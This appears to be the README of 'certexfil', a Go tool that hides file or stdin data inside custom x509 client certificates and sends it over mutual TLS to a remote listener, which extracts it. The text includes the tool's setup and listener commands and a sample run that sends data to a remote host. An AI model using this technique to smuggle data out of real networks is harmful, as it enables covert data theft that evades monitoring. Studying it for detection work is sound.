This project represents my initial venture into the Go programming language, focusing on data exfiltration techniques and their countermeasures. The primary goal is to develop a fun way to hide data by encoding a payload into a custom x509 digital certificate by reading from a file.
For an in-depth discussion on the topic, refer to my Medium article: Abusing Certificates for Data Exfiltration.
For those unfamiliar with the concepts of certificates and mutual TLS (mTLS), I recommend the following resources for a thorough understanding:
Certexfil operates in three modes: CA generation, client, and listener.
--cainitializes a CA for certificate creation and authentication.--payloadincorporates a file payload into a new client certificate for mTLS with a listener service.--listenlaunches a service that validates mTLS clients and extracts embedded payloads.
To create server_cert.pem and server_key.pem for mTLS:
somewhere$ certexfil -ca -ecdsa-curve P521 --host remote.host.comEnsure the certexfil binary and ./CERTS directory are on your remote server. Then, initiate the mTLS listener:
remoteserver$ ./certexfil --listenEmbedding output as a payload:
06:46:00 jma@wintermute Go-Workspace → echo 'w00t w00t' | certexfil --host remote.server.com --payload -
2019/05/31 18:48:27 [*] Reading from stdin..
2019/05/31 18:48:27 [D] Payload (raw) --> w00t w00t... (9 bytes)
2019/05/31 18:48:27 [D] Payload (Prepare()) --> �... (31 bytes)
2019/05/31 18:48:27 [*] Generated custom cert with payload
Oo- @Sourcefrenchy